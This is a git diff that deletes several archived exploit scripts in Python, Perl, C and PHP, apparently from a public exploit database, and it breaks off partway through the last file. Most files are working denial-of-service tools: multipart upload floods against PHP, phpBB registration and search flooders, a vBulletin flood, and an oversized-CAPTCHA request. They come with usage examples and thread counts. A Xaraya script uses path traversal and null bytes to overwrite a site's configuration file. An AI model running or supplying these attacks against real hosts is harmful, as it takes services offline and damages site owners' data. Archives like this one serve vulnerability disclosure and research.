@@ -1,173 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -# -# Author: -# Eren Turkay , 2009/11/20 -# http://www.pardus.org.tr/eng/ -# -# Credits: -# Bogdan Calin from Acunetix -# -# Description: -# Exploit to cause denial of service on any host that runs PHP via temporary -# file exhaustion. It doesn't matter whether the script handles uploads or not. -# If host runs PHP, it is enough to cause DoS using any PHP script it serves. -# -# This is the implementation of disclosed vulnerability that was found -# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/ -# -# Affected versions: -# All PHP versions before PHP 5.3.1 and unpatched 5.2.11 -# -# Platforms: -# Windows, Linux, Mac -# -# Fix: -# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]: -# -# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload) -# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so) -# -# Usage: -# python php-multipart-dos.py -# -# After opening childs, you may wait long for threads to finish because sending such a huge data is painful. -# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS. -# So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you. -# Trial and error ;)) -# -# Example: -# python php-multipart-dos.py www.example.com 8080 /index.php -# -# By defalt, the program will create 100 threads, each thread will send 10 requests. -# You can specify child number to create, you may want to increase or decrease for the impact, etc.. -# -# python php-multipart-dos.py www.example.com 80 /~user/index.php 50 -# -# Notes: -# This script is for educational purposes only. 
Use it at your OWN risk! - -import socket -import random -import time -import threading -import sys - -class Connection: - def __init__(self, host, port): - self._host = host - self._port = port - self.sock = None - - def connect(self): - self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.sock.connect((self._host, self._port)) - - def send(self, msg): - if not self.sock: - raise "NotConnected" - else: - self.sock.send(msg) - - def close(self): - self.sock.close() - -class Exploit (threading.Thread): - def __init__(self, host, port, target): - self._host = host - self._port = port - self._target = target - threading.Thread.__init__(self) - - def getBoundary(self): - """ Return random boundary data """ - random.seed() - rnd = random.randrange(100000, 100000000) - data = "---------------------------%s" % rnd - return data - - def createPayload(self): - data = """POST %(target)s HTTP/1.1\r -Host: %(host)s\r -Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r -Connection: keep-alive\r -Content-Type: multipart/form-data; boundary=%(boundary)s\r -Content-Length: %(length)s\r\n\r\n""" - - boundary = self.getBoundary() - - # Create a number of upload data, 16.000, yeah! :) - for i in range(16000): - data += "--%s\r\n" % boundary - data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r -Content-Type: text/plain\r\n -Lorem ipsum dolor sit amet, consectetur adipiscing elit. 
In non blandit augue.\n\r\n""" % (i, i) - - data += "--%s--\r\n" % boundary - - return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))} - - def run(self): - payload = self.createPayload() - for i in range(0, 10): - c = Connection(self._host, self._port) - c.connect() - c.send(payload) - c.close() - sys.exit(0) - del payload - sys.exit(0) - -def usage(): - usage_data = """ - __^__ __^__ -( ___ )------------------------------------------------( ___ ) - | / | | \ | - | / | Eren Turkay , 2009/11/20 | \ | - | / | http://www.pardus.org.tr/eng/ | \ | - |___| |___| -(_____)------------------------------------------------(_____) - -PHP denial of service exploit via temporary file exhaustion -Usage: python php-multipart-dos.py - -See source code for more information -""" - - print usage_data - -if __name__ == '__main__': - if not len(sys.argv) >= 4: - usage() - else: - # is child number passed? - if len(sys.argv) >= 5: - child = int(sys.argv[4]) - else: - child = 100 - print "[+] Attack started..." - for i in range(0, child): - try: - exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3])) - exp.start() - print "[+] Opening %s childs... [%s]\r" % (child, i+1), - sys.stdout.flush() - i += 1 - except KeyboardInterrupt: - print "\n[-] Keyboard Interrupt. Exiting..." - sys.exit(1) - - # print it so that previous "Opening childs..." is still there - print "" - while True: - try: - activeChilds = threading.activeCount() - print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds, - sys.stdout.flush() - # we have one main process - if activeChilds == 1: - print "\nOK!" - sys.exit(0) - except KeyboardInterrupt: - print "\n[-] Exiting without waiting!" - sys.exit(1) \ No newline at end of file diff --git a/platforms/php/webapps/10243.txt b/platforms/php/webapps/10243.txt deleted file mode 100755 index 81627f802..000000000 --- a/platforms/php/webapps/10243.txt +++ /dev/null 
@@ -1,112 +0,0 @@ -#!/usr/bin/python - -# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 -# Bogdan Calin (bogdan@acunetix.com) -# -import httplib, urllib, sys, string, threading -from string import replace -from urlparse import urlparse - -def usage(): - print "****************************************************************************" - print " PHP MultiPart Form-Data Denial of Service proof of concept" - print " Bogdan Calin (bogdan@acunetix.com)" - print "" - print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" - print "" - print " [number_of_threads] - optional, default 10" - print " [number_of_files] - optional, default 15000" - print " [data] - content of the files, by default it will create files containing" - print " the string " - print "" - print " Example: php_mpfd_dos.py http://ubuntu/index.php" - print "****************************************************************************" - -class PhpMPFDDosThread ( threading.Thread ): - # Override Thread's __init__ method to accept the parameters needed: - def __init__ ( self, host, path, files ): - self.host = host - self.path = path - self.files = files - threading.Thread.__init__ ( self ) - - # run in loop - def run(self): - while(1): - try: - self.post_data() - except: - print "*", - - # post multipart_formdata - def post_data(self): - content_type, body = self.encode_multipart_formdata() - h = httplib.HTTPConnection(self.host) - headers = { - 'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', - 'Accept': '*/*', - 'Content-Type': content_type - } - h.request('POST', self.path, body, headers) - print ".", - - # encode multipart_formdata - def encode_multipart_formdata(self): - """ - adapted from http://code.activestate.com/recipes/146306/ - files is a sequence of (name, filename, value) elements for data to be uploaded as files - Return (content_type, body) ready for httplib.HTTP instance - """ - BOUNDARY = '----------PHP_MPFD_DOS' - CRLF = '\r\n' - L = [] - 
for (key, filename, value) in self.files: - L.append('--' + BOUNDARY) - L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) - L.append('Content-Type: application/octet-stream') - L.append('') - L.append(value) - L.append('--' + BOUNDARY + '--') - L.append('') - body = CRLF.join(L) - content_type = 'multipart/form-data; boundary=%s' % BOUNDARY - return content_type, body - -def main(): - if len(sys.argv)<=1: - usage() - sys.exit() - - # default values - number_of_threads = 10 - number_of_files = 15000 - data = "" - - if len(sys.argv)>2: - number_of_threads = int(sys.argv[2]) - - if len(sys.argv)>3: - number_of_files = int(sys.argv[3]) - - if len(sys.argv)>4: - data = sys.argv[4] - - url = sys.argv[1] - print "[-] target: " + url - - # parse target url - up = urlparse(url) - host = up.netloc - path = up.path - - # prepare files - files = [] - for i in range(0, number_of_files): - files.append(('fu[]', 'f'+str(i), data)) - - # start the threads - for x in xrange ( number_of_threads ): - PhpMPFDDosThread(host, path, files).start() - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/platforms/php/webapps/1063.pl b/platforms/php/webapps/1063.pl deleted file mode 100755 index 46ff8d389..000000000 --- a/platforms/php/webapps/1063.pl +++ /dev/null 
@@ -1,146 +0,0 @@ -#!/usr/bin/perl -## Name: NsT-phpBBDoS (Perl Version) -## Copyright: Neo Security Team -## Author: HaCkZaTaN -## Ported: g30rg3_x -## Date: 20/06/05 -## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x -## A Simple phpBB Registration And Search DoS Flooder. -## -## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl -## [+] -## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN -## [+] ported to Perl By g30rg3_x -## [+] Neo Security Team -## [+] -## [+] Host |without http://www.| victimshost.com -## [+] Path |example. /phpBB2/ or /| /phpBB2/ -## [+] Flood Type |1=Registration 2=Search| 1 -## [+] .......................................................... -## [+] .......................................................... -## [+] .......................................................... -## [+] .............................................. -## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed -## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" - -use IO::Socket; - -## Initialized X -$x = 0; - -## Flood Variables Provided By User -print q( -NsT-phpBBDoS v0.2 by HaCkZaTaN -ported to Perl By g30rg3_x -Neo Security Team - -); -print q(Host |without http://www.| ); -$host = ; -chop ($host); - -print q(Path |example. /phpBB2/ or /| ); -$pth = ; -chop ($pth); - -print q(Flood Type |1 = Registration, 2 = Search| ); -$type = ; -chop ($type); - -## If Type Is Equals To 1 or Registration -if($type == 1){ - -## User Loop for 9999 loops (enough for Flood xDDDD) -while($x != 9999) -{ - -## Building User in base X -$uname = "username=NsT__" . "$x"; - -## Building User Mail in base X -$umail = "&email=NsT__" . 
"$x"; - -## Final String to Send -$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; - -## Posit Length -$lrg = length $postit; - -## Connect Socket with Variables Provided By User -my $sock = new IO::Socket::INET ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp", - ); -die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; - -## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums -print $sock "POST $pth"."profile.php HTTP/1.1\n"; -print $sock "Host: $host\n"; -print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; -print $sock "Referer: $host\n"; -print $sock "Accept-Language: en-us\n"; -print $sock "Content-Type: application/x-www-form-urlencoded\n"; -print $sock "Accept-Encoding: gzip, deflate\n"; -print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; -print $sock "Connection: Keep-Alive\n"; -print $sock "Cache-Control: no-cache\n"; -print $sock "Content-Length: $lrg\n\n"; -print $sock "$postit\n"; -close($sock); - -## Print a "." 
for every loop -syswrite STDOUT, "."; - -## Increment X in One for every Loop -$x++; -} - -## If Type Is Equals To 2 or Search -} -elsif ($type == 2){ - -## User Search Loop for 9999 loops (enough for Flood xDDDD) -while($x != 9999) -{ -## Final Search String to Send -$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; - -## Posit Length -$lrg = length $postit; - -## Connect Socket with Variables Provided By User -my $sock = new IO::Socket::INET ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp", - ); -die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; - -## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums -print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; -print $sock "Host: $host\n"; -print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; -print $sock "Referer: $host\n"; -print $sock "Accept-Language: en-us\n"; -print $sock "Content-Type: application/x-www-form-urlencoded\n"; -print $sock "Accept-Encoding: gzip, deflate\n"; -print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; -print $sock "Connection: Keep-Alive\n"; -print $sock "Cache-Control: no-cache\n"; -print $sock "Content-Length: $lrg\n\n"; -print $sock "$postit\n"; -close($sock); - -## Print a "." for every loop -syswrite STDOUT, "."; - -## Increment X in One for every Loop -$x++; -} -}else{ -## STF??? What Do You Type - die "Option not Allowed O_o???\n"; -} - -# milw0rm.com [2005-06-22] diff --git a/platforms/php/webapps/1064.c b/platforms/php/webapps/1064.c deleted file mode 100755 index 0b4292dc4..000000000 --- a/platforms/php/webapps/1064.c +++ /dev/null 
@@ -1,248 +0,0 @@ -/* --------------------------------------------------------- -[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 --------------------------------------------------------- -Program: phpBB 2.0.15 -Homepage: http://www.phpbb.com -Vulnerable Versions: phpBB 2.0.15 & Lower versions -Risk: High Risk!! -Impact: Multiple DoS Vulnerabilities. - - -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==- ---------------------------------------------------------- - -- Description ---------------------------------------------------------- -phpBB is a high powered, fully scalable, and highly customizable -Open Source bulletin board package. phpBB has a user-friendly -interface, simple and straightforward administration panel, and -helpful FAQ. Based on the powerful PHP server language and your -choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, -phpBB is the ideal free community solution for all web sites. - -- Tested ---------------------------------------------------------- -localhost & many forums - -- Explotation ---------------------------------------------------------- -profile.php << By registering as many users as you can. -search.php << by searching in a way that the db couln't observe it. 
- -- Exploit ---------------------------------------------------------- -[C Source] -/* - Name: NsT-phpBBDoS - Copyright: NeoSecurityteam - Author: HaCkZaTaN - Date: 19/06/05 - Description: xD You must figure out the problem xD - - root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c - root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS - root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS - [+] NsT-phpBBDoS v0.1 by HaCkZaTaN - [+] NeoSecurityTeam - [+] Dos has begun....[+] - - [*] Use: ./NsT-phpBBDoS - [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com - root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com - [+] NsT-phpBBDoS v0.1 by HaCkZaTaN - [+] NeoSecurityTeam - [+] Dos has begun....[+] - - ................................. - root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" - root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE - MACHTYPE=i486-slackware-linux-gnu - root@NeoSecurity:/home/hackzatan# - -*/ - -#include -#include -#include -#include -#ifdef WIN32 -#include -#pragma comment(lib, "ws2_32") -#pragma pack(1) -#define WIN32_LEAN_AND_MEAN -#else -#include -#include -#include -#include -#include -#include -#endif - -#define __USE_GNU -#define _XOPEN_SOURCE - -int Connection(char *, int); -void Write_In(int , char *, char *a, char *, int); -char Use(char *); - -int main(int argc, char *argv[]) -{ - int sock, x = 0; - char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; - - puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN"); - puts("[+] NeoSecurityTeam"); - puts("[+] Dos has begun....[+]\n"); - fflush(stdout); - - if(argc != 4) Use(argv[0]); - - while(1) - { - sock = Connection(Host,80); - Write_In(sock, Path, Pro_Sea, Host, x); - #ifndef WIN32 - shutdown(sock, SHUT_WR); - close(sock); - #else - closesocket(sock); - WSACleanup(); - #endif - Pro_Sea = argv[2]; - x++; - } - //I don't think that it will get here =) - - return 0; -} - -int Connection(char *Host, int Port) 
-{ - #ifndef WIN32 - #define SOCKET int - #else - int error; - WSADATA wsadata; - error = WSAStartup(MAKEWORD(2, 2), &wsadata); - - if (error == SOCKET_ERROR) - { - perror("Could Not Start Up Winsock!\n"); - return; - } - - #endif - - SOCKET sockfd; - struct sockaddr_in sin; - struct in_addr *myaddr; - struct hostent *h; - - if(Port <= 0 || Port > 65535) - { - puts("[-] Invalid Port Number\n"); - fflush(stdout); - exit(-1); - } - - if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) - { - perror("socket() "); - fflush (stdout); - exit(-1); - } - - if(isalpha(Host[0])) - { - if((h = gethostbyname(Host)) == NULL) - { - perror("gethostbyname() "); - fflush (stdout); - exit(-1); - } - } - else - { - myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); - myaddr->s_addr=inet_addr(Host); - - if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) - { - perror("gethostbyaddr() "); - fflush (stdout); - exit(-1); - } - } - - memset(&sin, 0, sizeof(sin)); - sin.sin_family = AF_INET; - sin.sin_port = htons(Port); - memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - - if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) - { - perror("connect() "); - exit (-1); - } - - return sockfd; -} - -void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) -{ - char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); - char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n" - "Accept: */*\r\n" - "Accept-Language: en-us\r\n" - "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" - "Accept encoding: gzip,deflate\r\n" - "Keep-Alive: 300\r\n" - "Proxy-Connection: keep-alive\r\n" - "Content-Type: application/x-www-form-urlencoded\r\n" - "Cache-Control: no-cache\r\n" - "Pragma: no-cache\r\n"; - char *Profile = 
"%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n"; - char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n"; - - if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile); - else if(strcmp("search.php", Pro_Sea) == 0) - { - Pro_Sea = "search.php?mode=results"; - sprintf(str1, "search_keywords=Hack%d%s", x, Search); - } - else - { - puts("Sorry. Try making the right choice"); - exit(-1); - } - - sprintf(str2, "POST %s%s HTTP/1.1\r\n" - "Host: %s\r\n" - "Referer: http://%s/\r\n%s" - "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); - - write(sock, str2, strlen(str2)); - write(1, ".", 1); - fflush(stdout); -} - -char Use(char *program) -{ - fprintf(stderr,"[*] Use: %s \n", program); - fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program); - fflush(stdout); - exit(-1); -} - -/* - -@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ -'@@@@@''@@'@@@''''''''@@''@@@''@@ -'@@'@@@@@@''@@@@@@@@@'''''@@@ -'@@'''@@@@'''''''''@@@''''@@@ -@@@@''''@@'@@@@@@@@@@''''@@@@@ - -*/ - -// milw0rm.com [2005-06-22] diff --git a/platforms/php/webapps/11397.txt b/platforms/php/webapps/11397.txt deleted file mode 100755 index 385ccc729..000000000 --- a/platforms/php/webapps/11397.txt +++ /dev/null 
@@ -1,27 +0,0 @@ -# Exploit Title: CaptchaSecurityImages.php Denial Of Service -# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il -# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php -# -##[Denial Of Service] -(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.) -# -#Exploit: -/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337 -# -# -The vuln code is: (lines 73-75) -# -$width = isset($_GET['width']) ? $_GET['width'] : '120'; -$height = isset($_GET['height']) ? $_GET['height'] : '40'; -$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6'; -# -To fix it- delete all the "$_GET[x]" strings and make it constant, like this: -# -$width=100; -$height=40; -$characters=5; -# -# -#[e0f] - - diff --git a/platforms/php/webapps/12186.pl b/platforms/php/webapps/12186.pl deleted file mode 100755 index 4c7753f89..000000000 --- a/platforms/php/webapps/12186.pl +++ /dev/null 
@@ -1,44 +0,0 @@ -# DOS Vbulletin 92% Works ;) -# -# Tested on all versions! and can DOS the server -# -#Perl Script -use Socket; -if (@ARGV < 2) { &usage } -$rand=rand(10); -$host = $ARGV[0]; -$dir = $ARGV[1]; -$host =~ s/(http:\/\/)//eg; -for ($i=0; $i<10; $i--) -{ -$user="vb".$rand.$i; -$data = "s=" -; -$len = length $data; -$foo = "POST ".$dir."index.php HTTP/1.1\r\n". -"Accept: */*\r\n". -"Accept-Language: en-gb\r\n". -"Content-Type: application/x-www-form-urlencoded\r\n". -"Accept-Encoding: gzip, deflate\r\n". -"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". -"Host: $host\r\n". -"Content-Length: $len\r\n". -"Connection: Keep-Alive\r\n". -"Cache-Control: no-cache\r\n\r\n". -"$data"; -my $port = "80"; -my $proto = getprotobyname('tcp'); -socket(SOCKET, PF_INET, SOCK_STREAM, $proto); -connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; -send(SOCKET,"$foo", 0); -syswrite STDOUT, "+" ; -} -print "\n\n"; -system('ping $host'); -sub usage { -print "\tusage: \n"; -print "\t$0 \n"; -print "\tex: $0 127.0.0.1 /forum/\n"; -print "\tex2: $0 127.0.0.1 /\n\n"; -exit(); -}; diff --git a/platforms/php/webapps/1345.php b/platforms/php/webapps/1345.php deleted file mode 100755 index 646086656..000000000 --- a/platforms/php/webapps/1345.php +++ /dev/null @@ -1,211 +0,0 @@ - ******** Xaraya <=1.0.0 rc4 Denial of Service ********* - -

-********** Xaraya <=1.0.0 rc4 Denial of Service ********

a -script by rgod at -http://rgod.altervista.org

* hostname (ex:www.sitename.com) -

* path (ex: -/xaraya/ or just / )

specify a port other than 80 ( default value )

-

send exploit -through an HTTP proxy (ip:port)

'; - - -function show($headeri) -{ -$ii=0; -$ji=0; -$ki=0; -$ci=0; -echo ''; -while ($ii <= strlen($headeri)-1) -{ -$datai=dechex(ord($headeri[$ii])); -if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) - { echo ""; - } - $ki=$ki+16; - echo ""; - } -if (strlen($datai)==1) {echo "";} else -{echo " ";} -$ii++; -$ji++; -} -for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; - } - -for ($li=$ci*16; $li<=strlen($headeri); $li++) - { echo ""; - } -echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() //if you have sockets module loaded, 2x speed! if not,load - //next function to send packets -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else - { $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid prozy...'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') - { - $result = socket_connect($socket, $host, $port); - } - else - { - - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else - { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - - } - } -} -function sendpacketii($packet) -{ -global $proxy, $host, $port, $html, $proxy_regex; -if ($proxy=='') - {$ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { echo 'No response from '.htmlentities($host); - die; } - } - else - { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid prozy...'; - die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { echo 'No response from proxy...'; - die; - } - } -fputs($ock,$packet); -if ($proxy=='') - { - - $html=''; - while (!feof($ock)) - { - $html.=fgets($ock); - } - } -else - { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) - { - $html.=fread($ock,1); - } - } -fclose($ock); -echo nl2br(htmlentities($html)); -} - -$host=$_POST[host];$path=$_POST[path]; -$port=$_POST[port];$proxy=$_POST[proxy]; - -if (($host<>'') and ($path<>'')) -{ - $port=intval(trim($port)); - if ($port=='') {$port=80;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r\n","",$host); - $path=str_replace("\r\n","",$path); - - $KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir... - $HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir... - $CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage - - $request[0]="index.php?module=".$KEYFILE; - $request[1]="index.php?module=".$HTACCESS; - $request[2]="index.php?module=".$CONFIGFILE; - $request[3]="index.php"; - - for($i=0; $i<=count($request)-1; $i++) - { - $packet="GET ".$p.$request[$i]." HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="User-Agent: Zoo Tycoon 2 Client\r\n"; - $packet.="Accept-Encoding: text/plain\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } - if (eregi('fatal error',$html)) {echo "Exploit succeeded...";} - else {echo "Exploit failed...";} - } -else - {echo "Fill * required fields, optionally specify a proxy";} -?> - -# milw0rm.com [2005-11-29] diff --git a/platforms/php/webapps/1517.c b/platforms/php/webapps/1517.c deleted file mode 100755 index 23ce866f5..000000000 --- a/platforms/php/webapps/1517.c +++ /dev/null 
@@ -1,176 +0,0 @@ -/* - Name: NST-Exploit Punbb 2.0.10 Denial Of Service - Copyright: NeoSecurity - Author: K4P0 - - [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/ - - ################################################# - PunBB 2.0.10 Denial of Service exploit by K4P0 - Use only at your own reputation risk! ;) - - www.NeoSecurityTeam.net - ################################################# - - [1] - Trying if connection is possible... - [2] - Connected! - [3] - Flooding localhost... - - Use it at your own risk!. -*/ - -#define WINDOWS -//#define LINUX - -#include -#include -#include -#ifdef WINDOWS -#include -#include -// Link to (lib)ws2_32.a -#else -#include -#include -#include -#endif - -#define NST_ALIVE 1 - -int Connect(char*); -void SendPack(int, int, char*, char*); -void _perror(char*); -void HowTo(char*); - -int main(int argc, char* argv[]) -{ - int vict_sock, dos = 0; - puts("#################################################"); - puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 "); - puts(" Use only at your own reputation risk! ;) \n"); - puts(" www.NeoSecurityTeam.net "); - if(argc < 4) HowTo(argv[0]); - puts("#################################################\n"); - - printf("[1] - Trying if connection is possible...\n", argv[1]); - fflush(stdout); - vict_sock = Connect(argv[2]); - printf("[2] - Connected!\n"); - printf("[3] - Flooding %s", argv[1]); - #ifdef WINDOWS - closesocket(vict_sock); - #else - close(vict_sock); - #endif - - while(NST_ALIVE) - { - if(!(dos % 10)) fprintf(stderr, "."); - vict_sock = Connect(argv[2]); - SendPack(vict_sock, dos, argv[3], argv[1]); - dos++; - #ifdef WINDOWS - closesocket(vict_sock); - WSACleanup(); - #else - close(vict_sock); - #endif - } - return 0; -} -// I'm to lazy to use gethostby(addr|name) :) -int Connect(char* IP) -{ - struct sockaddr_in *_addr; - int vict_sck; - - #ifdef WINDOWS - WSADATA wsaData; - if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - //WSAGetLastError()? Nah... 
- fprintf(stderr, "[*] WSAStartup() failed"); - exit(-1); - } - #endif - - if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in)))) - { - fprintf(stderr, "[*] Unable to reserve memory"); - exit(-1); - } - - memset(_addr, 0x0, sizeof(struct sockaddr_in)); - _addr->sin_family = AF_INET; - _addr->sin_port = htons(80); - _addr->sin_addr.s_addr = inet_addr(IP); - - #ifdef WINDOWS - if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) - { - fprintf(stderr, "WSASocket() failed"); - exit(-1); - } - else - if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - _perror("socket() "); - #endif - - if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0) - _perror("connect() "); - - free(_addr); - return vict_sck; -} - -void SendPack(int v_sck, int var, char* path, char* DNS) -{ - char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST; - if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) || - !(HTTP_POST = (char *)malloc(512))) - { - fprintf(stderr, "Error trying to reserver memory"); - 